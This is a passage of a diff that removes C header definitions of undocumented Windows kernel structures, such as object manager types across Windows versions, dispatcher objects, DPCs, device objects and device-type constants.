- struct _SECURITY_QUALITY_OF_SERVICE SecurityQos;
- void* ClientToken;
- UCHAR DirectlyAccessClientToken;
- UCHAR DirectAccessEffectiveOnly;
- UCHAR ServerIsRemote;
- struct _TOKEN_CONTROL ClientTokenControl;
- LONG __PADDING__[1];
-} SECURITY_CLIENT_CONTEXT, *PSECURITY_CLIENT_CONTEXT;
-
-typedef enum _POOL_TYPE {
- NonPagedPool,
- NonPagedPoolExecute = NonPagedPool,
- PagedPool,
- NonPagedPoolMustSucceed = NonPagedPool + 2,
- DontUseThisType,
- NonPagedPoolCacheAligned = NonPagedPool + 4,
- PagedPoolCacheAligned,
- NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,
- MaxPoolType,
- NonPagedPoolBase = 0,
- NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,
- NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,
- NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,
- NonPagedPoolSession = 32,
- PagedPoolSession = NonPagedPoolSession + 1,
- NonPagedPoolMustSucceedSession = PagedPoolSession + 1,
- DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,
- NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,
- PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,
- NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,
- NonPagedPoolNx = 512,
- NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,
- NonPagedPoolSessionNx = NonPagedPoolNx + 32
-} POOL_TYPE;
-
-//
-// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.
-//
-typedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE {// Size=120
- USHORT Length; // Size=2 Offset=0
- UCHAR ObjectTypeFlags; // Size=1 Offset=2
- ULONG ObjectTypeCode; // Size=4 Offset=4
- ULONG InvalidAttributes; // Size=4 Offset=8
- GENERIC_MAPPING GenericMapping; // Size=16 Offset=12
- ULONG ValidAccessMask; // Size=4 Offset=28
- ULONG RetainAccess; // Size=4 Offset=32
- POOL_TYPE PoolType; // Size=4 Offset=36
- ULONG DefaultPagedPoolCharge; // Size=4 Offset=40
- ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44
- PVOID DumpProcedure; // Size=8 Offset=48
- PVOID OpenProcedure; // Size=8 Offset=56
- PVOID CloseProcedure; // Size=8 Offset=64
- PVOID DeleteProcedure; // Size=8 Offset=72
- PVOID ParseProcedure; // Size=8 Offset=80
- PVOID SecurityProcedure; // Size=8 Offset=88
- PVOID QueryNameProcedure; // Size=8 Offset=96
- PVOID OkayToCloseProcedure; // Size=8 Offset=104
-} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE;
-
-//
-// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.
-//
-typedef struct _OBJECT_TYPE_COMPATIBLE {
- LIST_ENTRY TypeList;
- UNICODE_STRING Name;
- PVOID DefaultObject;
- UCHAR Index;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo;
-} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;
-typedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE;
-
-//
-// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version.
-//
-
-typedef struct _OBJECT_TYPE_INITIALIZER_7 {
- USHORT Length;
- union
- {
- UCHAR ObjectTypeFlags;
- struct
- {
- UCHAR CaseInsensitive : 1;
- UCHAR UnnamedObjectsOnly : 1;
- UCHAR UseDefaultObject : 1;
- UCHAR SecurityRequired : 1;
- UCHAR MaintainHandleCount : 1;
- UCHAR MaintainTypeList : 1;
- UCHAR SupportsObjectCallbacks : 1;
- };
- };
- ULONG ObjectTypeCode;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG RetainAccess;
- POOL_TYPE PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
- PVOID DumpProcedure;
- PVOID OpenProcedure;
- PVOID CloseProcedure;
- PVOID DeleteProcedure;
- PVOID ParseProcedure;
- PVOID SecurityProcedure;
- PVOID QueryNameProcedure;
- PVOID OkayToCloseProcedure;
-} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7;
-
-//
-// Windows 8, new object type flag, WaitObject* members added
-//
-typedef struct _OBJECT_TYPE_INITIALIZER_8 {
- USHORT Length;
- union
- {
- UCHAR ObjectTypeFlags;
- struct
- {
- UCHAR CaseInsensitive : 1;
- UCHAR UnnamedObjectsOnly : 1;
- UCHAR UseDefaultObject : 1;
- UCHAR SecurityRequired : 1;
- UCHAR MaintainHandleCount : 1;
- UCHAR MaintainTypeList : 1;
- UCHAR SupportsObjectCallbacks : 1;
- UCHAR CacheAligned : 1;
- };
- };
- ULONG ObjectTypeCode;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG RetainAccess;
- POOL_TYPE PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
- PVOID DumpProcedure;
- PVOID OpenProcedure;
- PVOID CloseProcedure;
- PVOID DeleteProcedure;
- PVOID ParseProcedure;
- PVOID SecurityProcedure;
- PVOID QueryNameProcedure;
- PVOID OkayToCloseProcedure;
- ULONG WaitObjectFlagMask;
- USHORT WaitObjectFlagOffset;
- USHORT WaitObjectPointerOffset;
-} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8;
-
-//
-// Windows 10 RS1, new ObjectTypeFlags2 flag added,
-// ParseProcedure now has two variants with different parameters.
-//
-typedef struct _OBJECT_TYPE_INITIALIZER_RS1 {
- USHORT Length;
- union
- {
- UCHAR ObjectTypeFlags;
- struct
- {
- UCHAR CaseInsensitive : 1;
- UCHAR UnnamedObjectsOnly : 1;
- UCHAR UseDefaultObject : 1;
- UCHAR SecurityRequired : 1;
- UCHAR MaintainHandleCount : 1;
- UCHAR MaintainTypeList : 1;
- UCHAR SupportsObjectCallbacks : 1;
- UCHAR CacheAligned : 1;
- };
- };
- union
- {
- UCHAR ObjectTypeFlags2; //for ParseProcedureEx
- struct
- {
- UCHAR UseExtendedParameters : 1;
- UCHAR Reserved : 7;
- };
- };
- ULONG ObjectTypeCode;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG RetainAccess;
- POOL_TYPE PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
- PVOID DumpProcedure;
- PVOID OpenProcedure;
- PVOID CloseProcedure;
- PVOID DeleteProcedure;
- union {
- PVOID ParseProcedure;
- PVOID ParseProcedureEx;
- };
- PVOID SecurityProcedure;
- PVOID QueryNameProcedure;
- PVOID OkayToCloseProcedure;
- ULONG WaitObjectFlagMask;
- USHORT WaitObjectFlagOffset;
- USHORT WaitObjectPointerOffset;
-} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1;
-
-//
-// ObjectTypeFlags2 moved to extended to USHORT ObjectTypeFlags field.
-// It was that hard to do this since beginning?
-//
-typedef struct _OBJECT_TYPE_INITIALIZER_RS2 {
- USHORT Length;
- union
- {
- USHORT ObjectTypeFlags;
- struct
- {
- UCHAR CaseInsensitive : 1;
- UCHAR UnnamedObjectsOnly : 1;
- UCHAR UseDefaultObject : 1;
- UCHAR SecurityRequired : 1;
- UCHAR MaintainHandleCount : 1;
- UCHAR MaintainTypeList : 1;
- UCHAR SupportsObjectCallbacks : 1;
- UCHAR CacheAligned : 1;
- };
- struct
- {
- UCHAR UseExtendedParameters : 1;//for ParseProcedureEx
- UCHAR Reserved : 7;
- };
- };
- ULONG ObjectTypeCode;
- ULONG InvalidAttributes;
- GENERIC_MAPPING GenericMapping;
- ULONG ValidAccessMask;
- ULONG RetainAccess;
- POOL_TYPE PoolType;
- ULONG DefaultPagedPoolCharge;
- ULONG DefaultNonPagedPoolCharge;
- PVOID DumpProcedure;
- PVOID OpenProcedure;
- PVOID CloseProcedure;
- PVOID DeleteProcedure;
- union {
- PVOID ParseProcedure;
- PVOID ParseProcedureEx;
- };
- PVOID SecurityProcedure;
- PVOID QueryNameProcedure;
- PVOID OkayToCloseProcedure;
- ULONG WaitObjectFlagMask;
- USHORT WaitObjectFlagOffset;
- USHORT WaitObjectPointerOffset;
-} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2;
-
-//
-// OBJECT_TYPE definition vary only because of OBJECT_TYPE_INITIALIZER changes.
-//
-typedef struct _OBJECT_TYPE_7 {
- LIST_ENTRY TypeList;
- UNICODE_STRING Name;
- PVOID DefaultObject;
- UCHAR Index;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- OBJECT_TYPE_INITIALIZER_7 TypeInfo;
- EX_PUSH_LOCK TypeLock;
- ULONG Key;
- LIST_ENTRY CallbackList;
-} OBJECT_TYPE_7, POBJECT_TYPE_7;
-
-typedef struct _OBJECT_TYPE_8 {
- LIST_ENTRY TypeList;
- UNICODE_STRING Name;
- PVOID DefaultObject;
- UCHAR Index;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- OBJECT_TYPE_INITIALIZER_8 TypeInfo;
- EX_PUSH_LOCK TypeLock;
- ULONG Key;
- LIST_ENTRY CallbackList;
-} OBJECT_TYPE_8, POBJECT_TYPE_8;
-
-typedef struct _OBJECT_TYPE_RS1 {
- LIST_ENTRY TypeList;
- UNICODE_STRING Name;
- PVOID DefaultObject;
- UCHAR Index;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- OBJECT_TYPE_INITIALIZER_RS1 TypeInfo;
- EX_PUSH_LOCK TypeLock;
- ULONG Key;
- LIST_ENTRY CallbackList;
-} OBJECT_TYPE_RS1, POBJECT_TYPE_RS1;
-
-typedef struct _OBJECT_TYPE_RS2 {
- LIST_ENTRY TypeList;
- UNICODE_STRING Name;
- PVOID DefaultObject;
- UCHAR Index;
- ULONG TotalNumberOfObjects;
- ULONG TotalNumberOfHandles;
- ULONG HighWaterNumberOfObjects;
- ULONG HighWaterNumberOfHandles;
- OBJECT_TYPE_INITIALIZER_RS2 TypeInfo;
- EX_PUSH_LOCK TypeLock;
- ULONG Key;
- LIST_ENTRY CallbackList;
-} OBJECT_TYPE_RS2, POBJECT_TYPE_RS2;
-
-/*
-** brand new header starting from 6.1
-*/
-
-typedef struct _OBJECT_HEADER {
- LONG PointerCount;
- union
- {
- LONG HandleCount;
- PVOID NextToFree;
- };
- EX_PUSH_LOCK Lock;
- UCHAR TypeIndex;
- UCHAR TraceFlags;
- UCHAR InfoMask;
- UCHAR Flags;
- union
- {
- POBJECT_CREATE_INFORMATION ObjectCreateInfo;
- PVOID QuotaBlockCharged;
- };
- PVOID SecurityDescriptor;
- QUAD Body;
-} OBJECT_HEADER, *POBJECT_HEADER;
-
-#define OBJECT_TO_OBJECT_HEADER(obj) \
- CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )
-
-/*
-** OBJECT MANAGER END
-*/
-
-/*
-* WDM START
-*/
-#define TIMER_TOLERABLE_DELAY_BITS 6
-#define TIMER_EXPIRED_INDEX_BITS 6
-#define TIMER_PROCESSOR_INDEX_BITS 5
-
-typedef struct _DISPATCHER_HEADER {
- union {
- union {
- volatile LONG Lock;
- LONG LockNV;
- } DUMMYUNIONNAME;
-
- struct { // Events, Semaphores, Gates, etc.
- UCHAR Type; // All (accessible via KOBJECT_TYPE)
- UCHAR Signalling;
- UCHAR Size;
- UCHAR Reserved1;
- } DUMMYSTRUCTNAME;
-
- struct { // Timer
- UCHAR TimerType;
- union {
- UCHAR TimerControlFlags;
- struct {
- UCHAR Absolute : 1;
- UCHAR Wake : 1;
- UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;
- } DUMMYSTRUCTNAME;
- };
-
- UCHAR Hand;
- union {
- UCHAR TimerMiscFlags;
- struct {
-
-#if !defined(KENCODED_TIMER_PROCESSOR)
-
- UCHAR Index : TIMER_EXPIRED_INDEX_BITS;
-
-#else
-
- UCHAR Index : 1;
- UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;
-
-#endif
-
- UCHAR Inserted : 1;
- volatile UCHAR Expired : 1;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
- } DUMMYSTRUCTNAME2;
-
- struct { // Timer2
- UCHAR Timer2Type;
- union {
- UCHAR Timer2Flags;
- struct {
- UCHAR Timer2Inserted : 1;
- UCHAR Timer2Expiring : 1;
- UCHAR Timer2CancelPending : 1;
- UCHAR Timer2SetPending : 1;
- UCHAR Timer2Running : 1;
- UCHAR Timer2Disabled : 1;
- UCHAR Timer2ReservedFlags : 2;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- UCHAR Timer2Reserved1;
- UCHAR Timer2Reserved2;
- } DUMMYSTRUCTNAME3;
-
- struct { // Queue
- UCHAR QueueType;
- union {
- UCHAR QueueControlFlags;
- struct {
- UCHAR Abandoned : 1;
- UCHAR DisableIncrement : 1;
- UCHAR QueueReservedControlFlags : 6;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- UCHAR QueueSize;
- UCHAR QueueReserved;
- } DUMMYSTRUCTNAME4;
-
- struct { // Thread
- UCHAR ThreadType;
- UCHAR ThreadReserved;
- union {
- UCHAR ThreadControlFlags;
- struct {
- UCHAR CycleProfiling : 1;
- UCHAR CounterProfiling : 1;
- UCHAR GroupScheduling : 1;
- UCHAR AffinitySet : 1;
- UCHAR ThreadReservedControlFlags : 4;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- union {
- UCHAR DebugActive;
-
-#if !defined(_X86_)
-
- struct {
- BOOLEAN ActiveDR7 : 1;
- BOOLEAN Instrumented : 1;
- BOOLEAN Minimal : 1;
- BOOLEAN Reserved4 : 3;
- BOOLEAN UmsScheduled : 1;
- BOOLEAN UmsPrimary : 1;
- } DUMMYSTRUCTNAME;
-
-#endif
-
- } DUMMYUNIONNAME2;
- } DUMMYSTRUCTNAME5;
-
- struct { // Mutant
- UCHAR MutantType;
- UCHAR MutantSize;
- BOOLEAN DpcActive;
- UCHAR MutantReserved;
- } DUMMYSTRUCTNAME6;
- } DUMMYUNIONNAME;
-
- LONG SignalState; // Object lock
- LIST_ENTRY WaitListHead; // Object lock
-} DISPATCHER_HEADER, *PDISPATCHER_HEADER;
-
-typedef struct _KEVENT {
- DISPATCHER_HEADER Header;
-} KEVENT, *PKEVENT, *PRKEVENT;
-
-typedef struct _FAST_MUTEX {
- LONG_PTR Count;
- void *Owner;
- ULONG Contention;
- struct _KEVENT Event;
- ULONG OldIrql;
- LONG __PADDING__[1];
-} FAST_MUTEX, *PFAST_MUTEX;
-
-typedef struct _KMUTANT {
- DISPATCHER_HEADER Header;
- LIST_ENTRY MutantListEntry;
- struct _KTHREAD *OwnerThread;
- BOOLEAN Abandoned;
- UCHAR ApcDisable;
-} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;
-
-typedef struct _KSEMAPHORE {
- DISPATCHER_HEADER Header;
- LONG Limit;
-} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;
-
-typedef struct _KTIMER {
- DISPATCHER_HEADER Header;
- ULARGE_INTEGER DueTime;
- LIST_ENTRY TimerListEntry;
- struct _KDPC *Dpc;
- ULONG Processor;
- LONG Period;
-} KTIMER, *PKTIMER, *PRKTIMER;
-
-typedef struct _KDEVICE_QUEUE_ENTRY {
- LIST_ENTRY DeviceListEntry;
- ULONG SortKey;
- BOOLEAN Inserted;
-} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;
-
-typedef enum _KDPC_IMPORTANCE {
- LowImportance,
- MediumImportance,
- HighImportance
-} KDPC_IMPORTANCE;
-
-typedef struct _KDPC {
- union {
- ULONG TargetInfoAsUlong;
- struct {
- UCHAR Type;
- UCHAR Importance;
- volatile USHORT Number;
- } DUMMYSTRUCTNAME;
- } DUMMYUNIONNAME;
-
- SINGLE_LIST_ENTRY DpcListEntry;
- KAFFINITY ProcessorHistory;
- PVOID DeferredRoutine;
- PVOID DeferredContext;
- PVOID SystemArgument1;
- PVOID SystemArgument2;
- __volatile PVOID DpcData;
-} KDPC, *PKDPC, *PRKDPC;
-
-typedef struct _WAIT_CONTEXT_BLOCK {
- union {
- KDEVICE_QUEUE_ENTRY WaitQueueEntry;
- struct {
- LIST_ENTRY DmaWaitEntry;
- ULONG NumberOfChannels;
- ULONG SyncCallback : 1;
- ULONG DmaContext : 1;
- ULONG Reserved : 30;
- };
- };
- PVOID DeviceRoutine;
- PVOID DeviceContext;
- ULONG NumberOfMapRegisters;
- PVOID DeviceObject;
- PVOID CurrentIrp;
- PKDPC BufferChainingDpc;
-} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;
-
-#define MAXIMUM_VOLUME_LABEL_LENGTH (32 * sizeof(WCHAR)) // 32 characters
-
-typedef struct _VPB {
- CSHORT Type;
- CSHORT Size;
- USHORT Flags;
- USHORT VolumeLabelLength; // in bytes
- struct _DEVICE_OBJECT *DeviceObject;
- struct _DEVICE_OBJECT *RealDevice;
- ULONG SerialNumber;
- ULONG ReferenceCount;
- WCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];
-} VPB, *PVPB;
-
-typedef struct _KQUEUE {
- DISPATCHER_HEADER Header;
- LIST_ENTRY EntryListHead;
- ULONG CurrentCount;
- ULONG MaximumCount;
- LIST_ENTRY ThreadListHead;
-} KQUEUE, *PKQUEUE;
-
-typedef struct _KDEVICE_QUEUE {
- CSHORT Type;
- CSHORT Size;
- LIST_ENTRY DeviceListHead;
- KSPIN_LOCK Lock;
-
-#if defined(_AMD64_)
-
- union {
- BOOLEAN Busy;
- struct {
- LONG64 Reserved : 8;
- LONG64 Hint : 56;
- };
- };
-
-#else
-
- BOOLEAN Busy;
-
-#endif
-
-} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;
-
-enum _KOBJECTS {
- EventNotificationObject = 0x0,
- EventSynchronizationObject = 0x1,
- MutantObject = 0x2,
- ProcessObject = 0x3,
- QueueObject = 0x4,
- SemaphoreObject = 0x5,
- ThreadObject = 0x6,
- GateObject = 0x7,
- TimerNotificationObject = 0x8,
- TimerSynchronizationObject = 0x9,
- Spare2Object = 0xa,
- Spare3Object = 0xb,
- Spare4Object = 0xc,
- Spare5Object = 0xd,
- Spare6Object = 0xe,
- Spare7Object = 0xf,
- Spare8Object = 0x10,
- Spare9Object = 0x11,
- ApcObject = 0x12,
- DpcObject = 0x13,
- DeviceQueueObject = 0x14,
- EventPairObject = 0x15,
- InterruptObject = 0x16,
- ProfileObject = 0x17,
- ThreadedDpcObject = 0x18,
- MaximumKernelObject = 0x19,
-};
-
-#define DO_VERIFY_VOLUME 0x00000002 // ntddk nthal ntifs wdm
-#define DO_BUFFERED_IO 0x00000004 // ntddk nthal ntifs wdm
-#define DO_EXCLUSIVE 0x00000008 // ntddk nthal ntifs wdm
-#define DO_DIRECT_IO 0x00000010 // ntddk nthal ntifs wdm
-#define DO_MAP_IO_BUFFER 0x00000020 // ntddk nthal ntifs wdm
-#define DO_DEVICE_HAS_NAME 0x00000040 // ntddk nthal ntifs
-#define DO_DEVICE_INITIALIZING 0x00000080 // ntddk nthal ntifs wdm
-#define DO_SYSTEM_BOOT_PARTITION 0x00000100 // ntddk nthal ntifs
-#define DO_LONG_TERM_REQUESTS 0x00000200 // ntddk nthal ntifs
-#define DO_NEVER_LAST_DEVICE 0x00000400 // ntddk nthal ntifs
-#define DO_SHUTDOWN_REGISTERED 0x00000800 // ntddk nthal ntifs wdm
-#define DO_BUS_ENUMERATED_DEVICE 0x00001000 // ntddk nthal ntifs wdm
-#define DO_POWER_PAGABLE 0x00002000 // ntddk nthal ntifs wdm
-#define DO_POWER_INRUSH 0x00004000 // ntddk nthal ntifs wdm
-#define DO_POWER_NOOP 0x00008000
-#define DO_LOW_PRIORITY_FILESYSTEM 0x00010000 // ntddk nthal ntifs
-#define DO_XIP 0x00020000
-
-#define FILE_REMOVABLE_MEDIA 0x00000001
-#define FILE_READ_ONLY_DEVICE 0x00000002
-#define FILE_FLOPPY_DISKETTE 0x00000004
-#define FILE_WRITE_ONCE_MEDIA 0x00000008
-#define FILE_REMOTE_DEVICE 0x00000010
-#define FILE_DEVICE_IS_MOUNTED 0x00000020
-#define FILE_VIRTUAL_VOLUME 0x00000040
-#define FILE_AUTOGENERATED_DEVICE_NAME 0x00000080
-#define FILE_DEVICE_SECURE_OPEN 0x00000100
-#define FILE_CHARACTERISTIC_PNP_DEVICE 0x00000800
-#define FILE_CHARACTERISTIC_TS_DEVICE 0x00001000
-#define FILE_CHARACTERISTIC_WEBDAV_DEVICE 0x00002000
-#define FILE_CHARACTERISTIC_CSV 0x00010000
-#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
-#define FILE_PORTABLE_DEVICE 0x00040000
-
-#define FILE_DEVICE_BEEP 0x00000001
-#define FILE_DEVICE_CD_ROM 0x00000002
-#define FILE_DEVICE_CD_ROM_FILE_SYSTEM 0x00000003
-#define FILE_DEVICE_CONTROLLER 0x00000004
-#define FILE_DEVICE_DATALINK 0x00000005
-#define FILE_DEVICE_DFS 0x00000006
-#define FILE_DEVICE_DISK 0x00000007
-#define FILE_DEVICE_DISK_FILE_SYSTEM 0x00000008
-#define FILE_DEVICE_FILE_SYSTEM 0x00000009
-#define FILE_DEVICE_INPORT_PORT 0x0000000a
-#define FILE_DEVICE_KEYBOARD 0x0000000b
-#define FILE_DEVICE_MAILSLOT 0x0000000c
-#define FILE_DEVICE_MIDI_IN 0x0000000d
-#define FILE_DEVICE_MIDI_OUT 0x0000000e
-#define FILE_DEVICE_MOUSE 0x0000000f
-#define FILE_DEVICE_MULTI_UNC_PROVIDER 0x00000010
-#define FILE_DEVICE_NAMED_PIPE 0x00000011
-#define FILE_DEVICE_NETWORK 0x00000012
-#define FILE_DEVICE_NETWORK_BROWSER 0x00000013
-#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
-#define FILE_DEVICE_NULL 0x00000015
-#define FILE_DEVICE_PARALLEL_PORT 0x00000016
-#define FILE_DEVICE_PHYSICAL_NETCARD 0x00000017
-#define FILE_DEVICE_PRINTER 0x00000018
-#define FILE_DEVICE_SCANNER 0x00000019
-#define FILE_DEVICE_SERIAL_MOUSE_PORT 0x0000001a
-#define FILE_DEVICE_SERIAL_PORT 0x0000001b
-#define FILE_DEVICE_SCREEN 0x0000001c
-#define FILE_DEVICE_SOUND 0x0000001d
-#define FILE_DEVICE_STREAMS 0x0000001e
-#define FILE_DEVICE_TAPE 0x0000001f
-#define FILE_DEVICE_TAPE_FILE_SYSTEM 0x00000020
-#define FILE_DEVICE_TRANSPORT 0x00000021
-#define FILE_DEVICE_UNKNOWN 0x00000022
-#define FILE_DEVICE_VIDEO 0x00000023
-#define FILE_DEVICE_VIRTUAL_DISK 0x00000024
-#define FILE_DEVICE_WAVE_IN 0x00000025
-#define FILE_DEVICE_WAVE_OUT 0x00000026
-#define FILE_DEVICE_8042_PORT 0x00000027
-#define FILE_DEVICE_NETWORK_REDIRECTOR 0x00000028
-#define FILE_DEVICE_BATTERY 0x00000029
-#define FILE_DEVICE_BUS_EXTENDER 0x0000002a
-#define FILE_DEVICE_MODEM 0x0000002b
-#define FILE_DEVICE_VDM 0x0000002c
-#define FILE_DEVICE_MASS_STORAGE 0x0000002d
-#define FILE_DEVICE_SMB 0x0000002e
-#define FILE_DEVICE_KS 0x0000002f
-#define FILE_DEVICE_CHANGER 0x00000030
-#define FILE_DEVICE_SMARTCARD 0x00000031
-#define FILE_DEVICE_ACPI 0x00000032
-#define FILE_DEVICE_DVD 0x00000033
-#define FILE_DEVICE_FULLSCREEN_VIDEO 0x00000034
-#define FILE_DEVICE_DFS_FILE_SYSTEM 0x00000035
-#define FILE_DEVICE_DFS_VOLUME 0x00000036
-#define FILE_DEVICE_SERENUM 0x00000037
-#define FILE_DEVICE_TERMSRV 0x00000038
-#define FILE_DEVICE_KSEC 0x00000039
-#define FILE_DEVICE_FIPS 0x0000003A
-#define FILE_DEVICE_INFINIBAND 0x0000003B
-#define FILE_DEVICE_VMBUS 0x0000003E
-#define FILE_DEVICE_CRYPT_PROVIDER 0x0000003F
-#define FILE_DEVICE_WPD 0x00000040
-#define FILE_DEVICE_BLUETOOTH 0x00000041
-#define FILE_DEVICE_MT_COMPOSITE 0x00000042
-#define FILE_DEVICE_MT_TRANSPORT 0x00000043
-#define FILE_DEVICE_BIOMETRIC 0x00000044
-#define FILE_DEVICE_PMI 0x00000045
-#define FILE_DEVICE_EHSTOR 0x00000046
-#define FILE_DEVICE_DEVAPI 0x00000047
-#define FILE_DEVICE_GPIO 0x00000048
-#define FILE_DEVICE_USBEX 0x00000049
-#define FILE_DEVICE_CONSOLE 0x00000050
-#define FILE_DEVICE_NFP 0x00000051
-#define FILE_DEVICE_SYSENV 0x00000052
-#define FILE_DEVICE_VIRTUAL_BLOCK 0x00000053
-#define FILE_DEVICE_POINT_OF_SERVICE 0x00000054
-
-#define FILE_BYTE_ALIGNMENT 0x00000000
-#define FILE_WORD_ALIGNMENT 0x00000001
-#define FILE_LONG_ALIGNMENT 0x00000003
-#define FILE_QUAD_ALIGNMENT 0x00000007
-#define FILE_OCTA_ALIGNMENT 0x0000000f
-#define FILE_32_BYTE_ALIGNMENT 0x0000001f
-#define FILE_64_BYTE_ALIGNMENT 0x0000003f
-#define FILE_128_BYTE_ALIGNMENT 0x0000007f
-#define FILE_256_BYTE_ALIGNMENT 0x000000ff
-#define FILE_512_BYTE_ALIGNMENT 0x000001ff
-
-#define DPC_NORMAL 0
-#define DPC_THREADED 1
-
-typedef struct _DEVICE_OBJECT {
- CSHORT Type;
- USHORT Size;
- LONG ReferenceCount;
- struct _DRIVER_OBJECT *DriverObject;
- struct _DEVICE_OBJECT *NextDevice;
- struct _DEVICE_OBJECT *AttachedDevice;
- struct _IRP *CurrentIrp;
- PVOID Timer;
- ULONG Flags;
- ULONG Characteristics;
- __volatile PVPB Vpb;
- PVOID DeviceExtension;
- DEVICE_TYPE DeviceType;
- CCHAR StackSize;
- union {
- LIST_ENTRY ListEntry;
- WAIT_CONTEXT_BLOCK Wcb;
- } Queue;
- ULONG AlignmentRequirement;
- KDEVICE_QUEUE DeviceQueue;
- KDPC Dpc;
- ULONG ActiveThreadCount;
- PSECURITY_DESCRIPTOR SecurityDescriptor;
- KEVENT DeviceLock;
- USHORT SectorSize;
- USHORT Spare1;
- struct _DEVOBJ_EXTENSION * DeviceObjectExtension;
- PVOID Reserved;
-} DEVICE_OBJECT, *PDEVICE_OBJECT;
-
-typedef struct _DEVOBJ_EXTENSION {
-
- CSHORT Type;
- USHORT Size;
-
- //
- // Public part of the DeviceObjectExtension structure
- //
-
- PDEVICE_OBJECT DeviceObject; // owning device object
-
- // end_ntddk end_nthal end_ntifs end_wdm end_ntosp
-
- //
- // Universal Power Data - all device objects must have this
- //
-
- ULONG PowerFlags; // see ntos\po\pop.h
- // WARNING: Access via PO macros
- // and with PO locking rules ONLY.
-
- //
- // Pointer to the non-universal power data
- // Power data that only some device objects need is stored in the
- // device object power extension -> DOPE
- // see po.h
- //
-
- struct _DEVICE_OBJECT_POWER_EXTENSION *Dope;
-
- //
- // power state information
- //
-
- //
- // Device object extension flags. Protected by the IopDatabaseLock.
- //
-
- ULONG ExtensionFlags;
-
- //
- // PnP manager fields
- //
-
- PVOID DeviceNode;
-
- //
- // AttachedTo is a pointer to the device object that this device
- // object is attached to. The attachment chain is now doubly
- // linked: this pointer and DeviceObject->AttachedDevice provide the
- // linkage.
- //
-
- PDEVICE_OBJECT AttachedTo;
-
- //
- // The next two fields are used to prevent recursion in IoStartNextPacket
- // interfaces.
- //
-
- LONG StartIoCount; // Used to keep track of number of pending start ios.
- LONG StartIoKey; // Next startio key
- ULONG StartIoFlags; // Start Io Flags. Need a separate flag so that it can be accessed without locks
- PVPB Vpb; // If not NULL contains the VPB of the mounted volume.
- // Set in the filesystem's volume device object.
- // This is a reverse VPB pointer.
-
- // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp
-
-} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;
-
-typedef struct _FAST_IO_DISPATCH {
- ULONG SizeOfFastIoDispatch;
- PVOID FastIoCheckIfPossible;
- PVOID FastIoRead;
- PVOID FastIoWrite;
- PVOID FastIoQueryBasicInfo;
- PVOID FastIoQueryStandardInfo;
- PVOID FastIoLock;
- PVOID FastIoUnlockSingle;
- PVOID FastIoUnlockAll;
- PVOID FastIoUnlockAllByKey;
- PVOID FastIoDeviceControl;
- PVOID AcquireFileForNtCreateSection;
- PVOID ReleaseFileForNtCreateSection;
- PVOID FastIoDetachDevice;
- PVOID FastIoQueryNetworkOpenInfo;
- PVOID AcquireForModWrite;
- PVOID MdlRead;
